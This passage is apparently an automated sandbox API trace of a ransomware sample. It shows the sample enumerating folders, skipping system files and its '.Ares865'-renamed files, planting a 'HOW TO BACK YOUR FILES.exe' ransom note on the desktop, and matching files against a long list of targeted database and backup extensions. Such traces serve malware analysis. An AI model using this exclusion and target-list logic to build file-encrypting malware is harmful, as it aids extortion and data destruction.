ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5081db80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3ec8e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Maid with the Flaxen Hair.mp3.Ares865", cAlternateFileName="MAIDWI~1.ARE")) returned 1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="aoldtz.exe") returned 1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2=".") returned 1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="..") returned 1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="windows") returned -1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="bootmgr") returned 1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="temp") returned -1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="pagefile.sys") returned -1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="boot") returned 1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="ids.txt") returned 1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="ntuser.dat") returned -1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="perflogs") returned -1 [0057.400] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.Ares865", lpString2="MSBuild") returned -1 [0057.400] lstrlenW (lpString="Maid with the Flaxen Hair.mp3.Ares865") returned 37 [0057.400] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\Sample Music\\Kalimba.mp3.Ares865") returned 67 [0057.400] lstrcpyW (in: lpString1=0x2cce460, lpString2="Maid with the Flaxen Hair.mp3.Ares865" | out: lpString1="Maid with the Flaxen Hair.mp3.Ares865") returned="Maid with the Flaxen Hair.mp3.Ares865" [0057.400] lstrlenW (lpString="Maid with the Flaxen Hair.mp3.Ares865") returned 37 [0057.400] lstrlenW (lpString="Ares865") returned 7 [0057.400] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.400] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x49e760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sleep Away.mp3.Ares865", cAlternateFileName="SLEEPA~1.ARE")) returned 1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="aoldtz.exe") returned 1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2=".") returned 1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="..") returned 1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="windows") returned -1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="bootmgr") returned 1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="temp") returned -1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="pagefile.sys") returned 1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="boot") returned 1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="ids.txt") returned 1 [0057.400] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="ntuser.dat") returned 1 [0057.401] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="perflogs") returned 1 [0057.401] lstrcmpiW (lpString1="Sleep Away.mp3.Ares865", lpString2="MSBuild") returned 1 [0057.401] lstrlenW (lpString="Sleep Away.mp3.Ares865") returned 22 [0057.401] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\Sample Music\\Maid with the Flaxen Hair.mp3.Ares865") returned 85 [0057.401] lstrcpyW (in: lpString1=0x2cce460, lpString2="Sleep Away.mp3.Ares865" | out: lpString1="Sleep Away.mp3.Ares865") returned="Sleep Away.mp3.Ares865" [0057.401] lstrlenW (lpString="Sleep Away.mp3.Ares865") returned 22 [0057.401] lstrlenW (lpString="Ares865") returned 7 [0057.401] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0057.401] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x49e760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sleep Away.mp3.Ares865", cAlternateFileName="SLEEPA~1.ARE")) returned 0 [0057.401] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0057.401] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0057.401] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Desktop", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0057.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed058 | out: hHeap=0x2b0000) returned 1 [0057.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0057.401] lstrlenW (lpString="C:\\Users\\Public\\Desktop") returned 23 [0057.401] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0057.401] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.401] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Desktop\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\desktop\\how to back your files.exe"), bFailIfExists=1) returned 0 [0057.401] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0057.402] GetLastError () returned 0x0 [0057.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0057.402] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0057.402] CloseHandle (hObject=0x118) returned 1 [0057.402] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0057.402] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.402] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ac48e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ac48e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0057.402] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.402] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.402] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.402] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ac48e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ac48e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.402] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.402] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0057.402] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.402] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.402] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0057.402] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.402] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="aoldtz.exe") returned -1 [0057.402] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".") returned 1 [0057.402] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="..") returned 1 [0057.402] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="windows") returned -1 [0057.402] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="bootmgr") returned -1 [0057.402] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="temp") returned -1 [0057.403] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="pagefile.sys") returned -1 [0057.403] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="boot") returned -1 [0057.403] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="ids.txt") returned -1 [0057.403] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="ntuser.dat") returned -1 [0057.403] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="perflogs") returned -1 [0057.403] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="MSBuild") returned -1 [0057.403] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0057.403] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\*") returned 25 [0057.403] lstrcpyW (in: lpString1=0x2cce430, lpString2="Adobe Reader X.lnk" | out: lpString1="Adobe Reader X.lnk") returned="Adobe Reader X.lnk" [0057.403] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0057.403] lstrlenW (lpString="Ares865") returned 7 [0057.403] lstrcmpiW (lpString1="r X.lnk", lpString2="Ares865") returned 1 [0057.403] lstrlenW (lpString=".dll") returned 4 [0057.403] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".dll") returned 1 [0057.403] lstrlenW (lpString=".lnk") returned 4 [0057.403] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".lnk") returned 1 [0057.403] lstrlenW (lpString=".ini") returned 4 [0057.403] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".ini") returned 1 [0057.403] lstrlenW (lpString=".sys") returned 4 [0057.403] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2=".sys") returned 1 [0057.403] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0057.403] lstrlenW (lpString="bak") returned 3 [0057.403] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0057.403] lstrlenW (lpString="ba_") returned 3 [0057.403] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0057.403] lstrlenW (lpString="dbb") returned 3 [0057.403] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0057.403] lstrlenW (lpString="vmdk") returned 4 [0057.403] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0057.403] lstrlenW (lpString="rar") returned 3 [0057.403] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0057.403] lstrlenW (lpString="zip") returned 3 [0057.403] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0057.403] lstrlenW (lpString="tgz") returned 3 [0057.403] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0057.403] lstrlenW (lpString="vbox") returned 4 [0057.403] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0057.404] lstrlenW (lpString="vdi") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0057.404] lstrlenW (lpString="vhd") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0057.404] lstrlenW (lpString="vhdx") returned 4 [0057.404] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0057.404] lstrlenW (lpString="avhd") returned 4 [0057.404] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0057.404] lstrlenW (lpString="db") returned 2 [0057.404] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0057.404] lstrlenW (lpString="db2") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0057.404] lstrlenW (lpString="db3") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0057.404] lstrlenW (lpString="dbf") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0057.404] lstrlenW (lpString="mdf") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0057.404] lstrlenW (lpString="mdb") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0057.404] lstrlenW (lpString="sql") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0057.404] lstrlenW (lpString="sqlite") returned 6 [0057.404] lstrcmpiW (lpString1=" X.lnk", lpString2="sqlite") returned -1 [0057.404] lstrlenW (lpString="sqlite3") returned 7 [0057.404] lstrcmpiW (lpString1="r X.lnk", lpString2="sqlite3") returned -1 [0057.404] lstrlenW (lpString="sqlitedb") returned 8 [0057.404] lstrcmpiW (lpString1="er X.lnk", lpString2="sqlitedb") returned -1 [0057.404] lstrlenW (lpString="xml") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0057.404] lstrlenW (lpString="$er") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0057.404] lstrlenW (lpString="4dd") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0057.404] lstrlenW (lpString="4dl") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0057.404] lstrlenW (lpString="^^^") returned 3 [0057.404] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0057.405] lstrlenW (lpString="abs") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0057.405] lstrlenW (lpString="abx") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0057.405] lstrlenW (lpString="accdb") returned 5 [0057.405] lstrcmpiW (lpString1="X.lnk", lpString2="accdb") returned 1 [0057.405] lstrlenW (lpString="accdc") returned 5 [0057.405] lstrcmpiW (lpString1="X.lnk", lpString2="accdc") returned 1 [0057.405] lstrlenW (lpString="accde") returned 5 [0057.405] lstrcmpiW (lpString1="X.lnk", lpString2="accde") returned 1 [0057.405] lstrlenW (lpString="accdr") returned 5 [0057.405] lstrcmpiW (lpString1="X.lnk", lpString2="accdr") returned 1 [0057.405] lstrlenW (lpString="accdt") returned 5 [0057.405] lstrcmpiW (lpString1="X.lnk", lpString2="accdt") returned 1 [0057.405] lstrlenW (lpString="accdw") returned 5 [0057.405] lstrcmpiW (lpString1="X.lnk", lpString2="accdw") returned 1 [0057.405] lstrlenW (lpString="accft") returned 5 [0057.405] lstrcmpiW (lpString1="X.lnk", lpString2="accft") returned 1 [0057.405] lstrlenW (lpString="adb") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0057.405] lstrlenW (lpString="adb") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0057.405] lstrlenW (lpString="ade") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0057.405] lstrlenW (lpString="adf") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0057.405] lstrlenW (lpString="adn") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0057.405] lstrlenW (lpString="adp") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0057.405] lstrlenW (lpString="alf") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0057.405] lstrlenW (lpString="ask") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0057.405] lstrlenW (lpString="btr") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0057.405] lstrlenW (lpString="cat") returned 3 [0057.405] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0057.405] lstrlenW (lpString="cdb") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0057.406] lstrlenW (lpString="ckp") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0057.406] lstrlenW (lpString="cma") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0057.406] lstrlenW (lpString="cpd") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0057.406] lstrlenW (lpString="dacpac") returned 6 [0057.406] lstrcmpiW (lpString1=" X.lnk", lpString2="dacpac") returned -1 [0057.406] lstrlenW (lpString="dad") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0057.406] lstrlenW (lpString="dadiagrams") returned 10 [0057.406] lstrcmpiW (lpString1="ader X.lnk", lpString2="dadiagrams") returned -1 [0057.406] lstrlenW (lpString="daschema") returned 8 [0057.406] lstrcmpiW (lpString1="er X.lnk", lpString2="daschema") returned 1 [0057.406] lstrlenW (lpString="db-journal") returned 10 [0057.406] lstrcmpiW (lpString1="ader X.lnk", lpString2="db-journal") returned -1 [0057.406] lstrlenW (lpString="db-shm") returned 6 [0057.406] lstrcmpiW (lpString1=" X.lnk", lpString2="db-shm") returned -1 [0057.406] lstrlenW (lpString="db-wal") returned 6 [0057.406] lstrcmpiW (lpString1=" X.lnk", lpString2="db-wal") returned -1 [0057.406] lstrlenW (lpString="dbc") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0057.406] lstrlenW (lpString="dbs") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0057.406] lstrlenW (lpString="dbt") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0057.406] lstrlenW (lpString="dbv") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0057.406] lstrlenW (lpString="dbx") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0057.406] lstrlenW (lpString="dcb") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0057.406] lstrlenW (lpString="dct") returned 3 [0057.406] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0057.406] lstrlenW (lpString="dcx") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0057.407] lstrlenW (lpString="ddl") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0057.407] lstrlenW (lpString="dlis") returned 4 [0057.407] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0057.407] lstrlenW (lpString="dp1") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0057.407] lstrlenW (lpString="dqy") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0057.407] lstrlenW (lpString="dsk") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0057.407] lstrlenW (lpString="dsn") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0057.407] lstrlenW (lpString="dtsx") returned 4 [0057.407] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0057.407] lstrlenW (lpString="dxl") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0057.407] lstrlenW (lpString="eco") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0057.407] lstrlenW (lpString="ecx") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0057.407] lstrlenW (lpString="edb") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0057.407] lstrlenW (lpString="epim") returned 4 [0057.407] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0057.407] lstrlenW (lpString="fcd") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0057.407] lstrlenW (lpString="fdb") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0057.407] lstrlenW (lpString="fic") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0057.407] lstrlenW (lpString="flexolibrary") returned 12 [0057.407] lstrcmpiW (lpString1="Reader X.lnk", lpString2="flexolibrary") returned 1 [0057.407] lstrlenW (lpString="fm5") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0057.407] lstrlenW (lpString="fmp") returned 3 [0057.407] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0057.407] lstrlenW (lpString="fmp12") returned 5 [0057.408] lstrcmpiW (lpString1="X.lnk", lpString2="fmp12") returned 1 [0057.408] lstrlenW (lpString="fmpsl") returned 5 [0057.408] lstrcmpiW (lpString1="X.lnk", lpString2="fmpsl") returned 1 [0057.408] lstrlenW (lpString="fol") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0057.408] lstrlenW (lpString="fp3") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0057.408] lstrlenW (lpString="fp4") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0057.408] lstrlenW (lpString="fp5") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0057.408] lstrlenW (lpString="fp7") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0057.408] lstrlenW (lpString="fpt") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0057.408] lstrlenW (lpString="frm") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0057.408] lstrlenW (lpString="gdb") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0057.408] lstrlenW (lpString="gdb") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0057.408] lstrlenW (lpString="grdb") returned 4 [0057.408] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0057.408] lstrlenW (lpString="gwi") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0057.408] lstrlenW (lpString="hdb") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0057.408] lstrlenW (lpString="his") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0057.408] lstrlenW (lpString="ib") returned 2 [0057.408] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0057.408] lstrlenW (lpString="idb") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0057.408] lstrlenW (lpString="ihx") returned 3 [0057.408] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0057.408] lstrlenW (lpString="itdb") returned 4 [0057.409] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0057.409] lstrlenW (lpString="itw") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0057.409] lstrlenW (lpString="jet") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0057.409] lstrlenW (lpString="jtx") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0057.409] lstrlenW (lpString="kdb") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0057.409] lstrlenW (lpString="kexi") returned 4 [0057.409] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0057.409] lstrlenW (lpString="kexic") returned 5 [0057.409] lstrcmpiW (lpString1="X.lnk", lpString2="kexic") returned 1 [0057.409] lstrlenW (lpString="kexis") returned 5 [0057.409] lstrcmpiW (lpString1="X.lnk", lpString2="kexis") returned 1 [0057.409] lstrlenW (lpString="lgc") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0057.409] lstrlenW (lpString="lwx") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0057.409] lstrlenW (lpString="maf") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0057.409] lstrlenW (lpString="maq") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0057.409] lstrlenW (lpString="mar") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0057.409] lstrlenW (lpString="marshal") returned 7 [0057.409] lstrcmpiW (lpString1="r X.lnk", lpString2="marshal") returned 1 [0057.409] lstrlenW (lpString="mas") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0057.409] lstrlenW (lpString="mav") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0057.409] lstrlenW (lpString="maw") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0057.409] lstrlenW (lpString="mdbhtml") returned 7 [0057.409] lstrcmpiW (lpString1="r X.lnk", lpString2="mdbhtml") returned 1 [0057.409] lstrlenW (lpString="mdn") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0057.409] lstrlenW (lpString="mdt") returned 3 [0057.409] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0057.410] lstrlenW (lpString="mfd") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0057.410] lstrlenW (lpString="mpd") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0057.410] lstrlenW (lpString="mrg") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0057.410] lstrlenW (lpString="mud") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0057.410] lstrlenW (lpString="mwb") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0057.410] lstrlenW (lpString="myd") returned 3 [0057.410] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 